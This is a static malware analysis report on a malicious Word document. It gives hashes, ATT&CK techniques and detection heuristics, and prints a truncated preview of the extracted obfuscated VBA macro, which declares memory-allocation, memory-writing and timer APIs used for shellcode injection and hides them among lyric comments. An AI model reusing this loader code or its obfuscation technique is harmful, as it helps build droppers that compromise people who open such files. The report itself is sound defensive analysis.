Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8de9435f36ecca6a…

MALICIOUS

Office (OLE)

206.5 KB Created: 2017-08-08 11:42:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: 1abe20db8044ce90afe7206f2a69b188 SHA-1: 439fc2ff8fd98eded11605f28cff02649c0b0988 SHA-256: 8de9435f36ecca6ae39e76622d69ba5b95338519673cef7ffd708f446768a657
122 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The file is an Office document containing VBA macros, including a Document_Open macro, which is a common technique for malware execution. The presence of a macro-enable lure indicates an attempt to bypass security measures. The VBA code itself appears to be obfuscated, suggesting an intent to hide its malicious functionality, likely to download and execute a second-stage payload.

Heuristics 5

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 211,458 bytes but its declared streams total only 125,149 bytes — 86,309 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13266 bytes
SHA-256: ed307cbb7932b097fc2ec7968dcfeefe1f505c7e9a21d271c614fe7bfd2d8e27
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jacks"
'  Then you rolled in with your hair in the wind
'  Rain was driving, thunder, lightning
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
'  Driving us to your house
'  And hit me like a hurricane
Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long
'  I was doing alright
'  We locked eyes over whiskey on ice

'  We locked eyes over whiskey on ice
'  Driving us to your house
Public Declare PtrSafe Function naboom Lib "Ntdll.dll  " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr
'  Driving us to your house
'  You wrecked my whole world when you came
'  I was doing alright
Public Declare PtrSafe Function filefish Lib "Ntdll.dll  " Alias _
  "NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr
'  The moon went hiding, stars quit shining
'  But just your sight had my heart storming
Public Declare PtrSafe Function riesling Lib "Ntdll.dll  " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr
'  Rain was driving, thunder, lightning
'  Started talking bout us again

'  If I woulda just layed my drink down
'  I was doing alright

'  But just your sight had my heart storming
'  The moon went hiding, stars quit shining
#End If
'  But you rolled in with your hair in the wind
'  You wrecked my whole world when you came
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
'  But you rolled in with your hair in the wind
'  I was doing alright
Public Declare Function riesling Lib "Ntdll.dll   " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long
'  Baby, without warning
'  Baby, without warning

'  But you rolled in with your hair in the wind
'  Then you rolled in with your hair in the wind
Public Declare Function filefish Lib "Ntdll.dll " Alias _
  "NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long
'  But just your sight had my heart storming
'  I wouldnt be in my truck

'  I was doing alright
'  We locked eyes over whiskey on ice

'  Knew it was gonna be a long night
'  Rain was driving, thunder, lightning
'  If I woulda just layed my drink down
'  We locked eyes over whiskey on ice
Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long
'  But just your sight had my heart storming
'  And hit me like a hurricane
'  Baby, without warning
'  Knew it was gonna be a long night
#End If
'  Hit me like a hurricane
'  But just your sight had my heart storming
Function moving()
Dim pater(255) As Byte
choking = 3 - 100 + 162
Do
pater(choking) = choking - 65
choking = choking + 1
Loop While choking <= 90 + 1
choking = 40 + 8
Do
pater(choking) = choking + 4
choking = choking + 1
Loop While choking <= 50 + 8
choking = 90 + 7
Do
pater(choking) = choking - 71
choking = choking + 1
Loop While choking <= 120 + 3
pater(47) = 60 + 3
choking = 40 + 3
pater(choking) = 60 + 2
moving = pater
End Function
Function denunciation(attainture, abbess, lait)
Select Case lait
Case 33 + (10 / 2 - 5)
denunciation = attainture \ abbess
Case 43 + (5 - 3) / 2 - 1
denunciation = attainture And abbess
Case 51 + (56 / 7 - 4 * 2)
denunciation = attainture * abbess
End Select
End Function
Function bizons(wrd, buls, lky)
#If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * 
... (truncated)